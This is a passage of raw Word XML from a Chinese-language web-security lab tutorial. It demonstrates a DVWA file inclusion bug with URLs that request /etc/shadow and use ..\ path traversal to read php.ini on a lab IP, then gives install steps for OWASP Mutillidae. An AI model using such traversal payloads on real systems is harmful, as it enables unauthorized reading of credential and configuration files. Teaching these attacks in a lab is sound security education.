    </w:p>
    <w:p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1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>$file=$_GET[</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>'page'</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p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1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:cs="Consolas"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&gt;</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可以看到，服务器端对page参数没有做任何的过滤跟检查。</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服务器期望用户的操作是点击下面的三个链接，服务器会包含相应的文件，并将结果返回。需要特别说明的是，服务器包含文件时，不管文件后缀是否是php，都会尝试当做php文件执行，如果文件内容确为php，则会正常执行并返回结果，如果不是，则会原封不动地打印文件内容，所以文件包含漏洞常常会导致任意文件读取与任意命令执行。</w:t>
      </w:r>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782AE223" wp14:editId="203256AC">
            <wp:extent cx="5339751" cy="923027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49" name="图片 49" descr="1.pn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pn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1272" cy="923290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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点击file1.php后，显示如下</w:t>
      </w:r>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4633C4FF" wp14:editId="4B195389">
            <wp:extent cx="5262113" cy="1940944"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="48" name="图片 48" descr="1.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pn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2793" cy="1941195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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而现实中，恶意的攻击者是不会乖乖点击这些链接的，因此page参数是不可控的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用</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1.本地文件包含</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构造url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/vulnerabilities/fi/page=/etc/shadow</w:t>
        </w:r>
      </w:hyperlink>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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25A69400" wp14:editId="028886B1">
            <wp:extent cx="5279366" cy="2026861"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="图片 47" descr="1.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9519" cy="2026920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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报错，显示没有这个文件，说明不是服务器系统不是Linux，但同时暴露了服务器文件的绝对路径C:\xampp\htdocs。</w:t>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构造url（绝对路径）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/vulnerabilities/fi/page=C:\xampp\htdocs\dvwa\php.ini</w:t>
        </w:r>
      </w:hyperlink>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成功读取了服务器的php.ini文件</w:t>
      </w:r>
    </w:p>
    <w:p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4AA3DABD" wp14:editId="0B0B6579">
            <wp:extent cx="5124091" cy="2268748"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="46" name="图片 46" descr="1.pn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pn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4333" cy="2268855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>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构造url（相对路径）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/vulnerabilities/fi/page=..\..\..\..\..\..\..\..\..\xampp\htdocs\dvwa\php.ini</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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加这么多..\是为了保证到达服务器的C盘根目录，可以看到读取是成功的。</w:t>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4F409126" wp14:editId="7B0D2F80">
            <wp:extent cx="5279366" cy="4011179"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="71" name="图片 71" descr="1.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p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9519" cy="4011295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p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打开服务器的虚拟终端。</w:t>
      </w:r>
    </w:p>
    <w:p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43E43364" wp14:editId="249460C4">
            <wp:extent cx="5262113" cy="4218182"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70" name="图片 70" descr="1.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pn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2266" cy="4218305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00207330">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc499884685"/>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:t>OWASP Mutillidae</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId128" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>OWASP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（Open Web Application Security Project）是一个开源的、非盈利性的全球性安全组织。由全球的会员共同推动安全标准、安全测试工具、安全指导手册等应用安全技术的发展。OWASP也有中国的官方网站</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:t>http://www.owasp.org.cn/</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, 在这里可以关注到OWASP在中国的培训与活动等相关信息。</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="004D4162" w:rsidP="00D64CE4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId129" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>OWASP Mutillidae</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一个开源的、免费的漏洞演习系统，其是专门为OWASP提出的Top 10漏洞制作了题集，能够在系统中设置防范的等级，以及提示的详细程度等等，里面也有丰富的资料和视频链接可供学习。Mutillidae可以在Windows和Linux中进行安装</w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00207330" w:rsidP="00207330">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00D64CE4" w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mutillidae的安装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="00207330" w:rsidRDefault="00D64CE4" w:rsidP="00207330">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207330">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00207330">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>indows平台上的安装：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在windows下的安装类似于DVWA，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>依赖httpd、PHP、MySQL、php-mysql等应用或组件</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，可以基于xammp这个软件进行使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00CE1482">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下载mutillidae的安装文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/mutillidae/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B510615" wp14:editId="1E634D64">
            <wp:extent cx="5267325" cy="4210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D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、下载好安装包后解压到</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D:\xampp\htdocs\目录下,这里xampp是安装在D盘根目录下的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D:\xampp\htdocs\mutillidae</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的文件，修改允许访问的IP地址范围，默认只允许127.和localhost以及192.168.0.0/16的地址访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认配置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>## This allows access from localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>Allow from 127.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:lastRenderedPageBreak/>
        <w:t>Allow from localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4"/>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>## This is to allow access from other machines on Virtual Box host-only networks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>Allow from 192.168.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可修改为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>## This is to allow access from other machines on Virtual Box host-only networks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>Allow from 192.168.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>Allow from 10.0.0.0/8    #</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你所使用的本地的测试网络</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、mutillidae默认连接mysql的数据库用户名时root，密码为空，如果xammp的mysql的用户名和密码没有修改的话，就可以直接登陆，若是xammp的mysql的root账户的密码修改过，比如改成了root，则下需要在mutillidae的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t>D:\xampp\htdocs\mutillidae\classes</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:t>MySQLHandler.php</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中修改数据库的登陆密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:t>static public $mMySQLDatabasePassword = "root";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5、然后就可以直接在浏览器中输入</w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://127.0.0.1/mutillidae/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问mutilledae的漏洞平台了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="629CAF3F" wp14:editId="2FFBED63">
            <wp:extent cx="5274310" cy="3636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636010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4"/>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="00207330" w:rsidRDefault="00D64CE4" w:rsidP="00207330">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00207330">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00207330">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>inux平台上的安装：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然也可以根据自己的情况把mutillidae安装在LINUX系统上，由于mutillidae也想dvwa一样依赖apache，php和mysql，因此需要在准备linux的环境时注意，下面介绍在ubuntu系统上搭建mutillidae的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1）安装apache服务器和相关组件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo apt-get install apache2 apache2-utils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2）修改对应的配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D64CE4" w:rsidRPr="009655A2" w:rsidRDefault="00D64CE4" w:rsidP="00D64CE4">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#Modify file /etc/apache2/mods-enabled/dir.conf</w:t>
      </w:r>
    </w:p>
